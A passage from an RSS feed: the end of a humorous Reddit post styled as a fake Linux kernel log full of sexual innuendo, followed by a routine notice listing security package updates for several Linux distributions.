protocols negotiated and active.</p> <p>[ 0.700000] network_stack: Interface eth0 (Bonding) MAC Address [Forever:Yours]. Link is up. Throughput uncapped.</p> <p>[ 0.750000] network_stack: Firewall disabled. All ports open for direct connection.</p> <p>[ 0.800000] Filesystem [private.xfs]: Mounting.</p> <p>[ 0.800001] Filesystem [private.xfs]: Journaling disabled for maximum performance.</p> <p>[ 0.800002] Filesystem [private.xfs]: Ending clean mount. Ready for raw data writes.</p> <p>[ 0.900000] System state change: from multi_user_partnership to exclusive_session (runlevel 69).</p> <p>[ 1.000000] Reached target: Climax.</p> <p>[ 1.000001] System stable. All subsystems engaged and awaiting user command.</p> <p>[ 1.000002] kernel: Executing foreground process: /usr/bin/desire --args=all --now</p> <p>[ 1.000003] Watchdog: Hardware watchdog timer disabled. System will not auto-reboot.</p> <p>[ 1.000004] System up. All limits off. Proceeding with operations.</p> <p>[ 600.000000] kernel: High-priority foreground process /usr/bin/desire exited with status code 0 (Success).</p> <p>[ 600.000001] kernel: Reverting scheduler mode to 'normal'. Re-enabling all tasks.</p> <p>[ 600.000002] kernel: Beginning cleanup of user-space caches and temporary files.</p> <p>[ 600.100000] kernel: Sending SIGKILL to process group 'chrome.exe' matching pattern '*private-browsing*'.</p> <p>[ 600.100005] kernel: Sending SIGKILL to process group 'firefox.exe' matching pattern '*incognito*'.</p> <p>[ 600.200000] kernel: All transient browser processes terminated. History flushed.</p> <p>[ 600.300000] kernel: Initializing device: /dev/ttyS1 (Balcony Window).</p> <p>[ 600.300001] kernel: Executing /usr/bin/smoke --filter=menthol --timeout=300s</p> <p>[ 600.300002] kernel: System entering relaxed power-state C3 (Deep Sleep).</p> <p>[ 900.000000] kernel: Process /usr/bin/smoke exited. Flushing buffers.</p> <p>[ 900.000001] kernel: Restoring network firewall rules to default.</p> <p>[ 900.000002] kernel: Re-enabling watchdog timer. System returning to normal partnership mode.</p> <p>[ 900.000003] kernel: Awaiting next user interrupt.</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/Powerful_Site4940"> /u/Powerful_Site4940 </a> <br> <span><a href="https://www.reddit.com/r/linux/comments/1llkcil/help_debugging_kernel_reaches_target_climax_but/">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/1llkcil/help_debugging_kernel_reaches_target_climax_but/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Thursday]]></title>
<description><![CDATA[Security updates have been issued by Debian (firefox-esr and libxml2), Fedora (firefox, libtpms, and tigervnc), Mageia (chromium-browser-stable and nss & firefox), Oracle (emacs, iputils, kernel, krb5, libarchive, mod_proxy_cluster, pam, perl-File-Find-Rule, perl-YAML-LibYAML, and qt5-qtbase), Re...]]></description>
<link>https://tsecurity.de/de/2853405/linux-tipps/security-updates-for-thursday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2853405/linux-tipps/security-updates-for-thursday/</guid>
<pubDate>Thu, 26 Jun 2025 16:22:55 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>Debian</b> (firefox-esr and libxml2), <b>Fedora</b> (firefox, libtpms, and tigervnc), <b>Mageia</b> (chromium-browser-stable and nss &amp; firefox), <b>Oracle</b> (emacs, iputils, kernel, krb5, libarchive, mod_proxy_cluster, pam, perl-File-Find-Rule, perl-YAML-LibYAML, and qt5-qtbase), <b>Red Hat</b> (opentelemetry-collector, osbuild-composer, and weldr-client), <b>SUSE</b> (clamav, firefox, go1.24-openssl, and helm), and <b>Ubuntu</b> (libarchive, linux-azure, linux-azure-5.4, linux-azure-fips, linux-fips, linux-azure-nvidia, linux-oracle, linux-oracle-6.8, linux-raspi, linux-raspi-realtime, linux-xilinx-zynqmp, and python-urllib3).]]></content:encoded>
</item>
</channel>
</rss>
<!-- Generated in 0,19ms -->